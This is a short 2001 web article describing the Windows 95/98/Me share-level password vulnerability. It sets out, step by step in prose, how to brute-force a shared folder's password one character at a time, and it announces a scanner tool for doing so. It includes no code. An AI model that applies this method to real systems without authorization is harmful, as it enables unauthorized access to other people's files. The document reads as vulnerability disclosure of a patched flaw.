Reveal Windows9x Share Password
About "Share-Level Password" Vulnerability
There is a problem in the password verification when a client accesses a shared folder in Windows 95/98/Me. Anyone who doesn't know a password can access a shared folder. This problem is calling "Share-Level Password" Vulnerability. The server which has a shared folder must check whether a password corresponds perfectly. But, the server assumes the length of the password sent from the client is correct. Because of this, sometimes the server will only compare the actual password against the client's password up to the length of the password sent by the client.
For example, a client sends a one-character password. If the one-character password corresponds to the first character of the actual passwords, a client can access a shared folder. Furthermore, anyone can know the entire password of the shared folder with this vulnerability. Microsoft Corporation doesn't announce this fact. Patches for this vulnerability are on the site of Microsoft. Details and patches about this vulnerability are in the following URL.
And, NSFOCUS provides information in the following URL, too.
How to reveal a password
Well, let's explain about the way of revealing a password. First, a SMB client fixes password length of 1, and sends a password to a server. A client sends one-character passwords repeatedly changing the character until it can access the shared folder. A client closes the connection after it can access with the one-character password. Next, a client set password length of data on 2, and sends a two-character password. A client sends two-character passwords repeatedly changing the second character in the similar way as the first-character case. At this time, a client sets the first character of password on the success character. Then, a client keeps sending passwords in the same way until it reaches [actual password length + 1] character. The plus 1 case is when you have set all the characters and they all failed. Finally, you know the password.
The following condition is necessary to succeed.
1) The server's OS uses share-level access control in which an account name shouldn't be necessary for the authentication. (Windows95/98/Me)
2) The SMB client can send a plaintext password.
* The SMB client usually sends an encrypted password according to requirement of the server.
3) The SMB client can change a password and password length flexibly.
"Windows 9x Share Password Scanner" reveals the password of all the shared folder of the server. "Windows 9x Share Password Scanner" will be uploaded soon. This tool will be found useful when you forget the password of the shared folder.
By Temeran (Jan. 2001)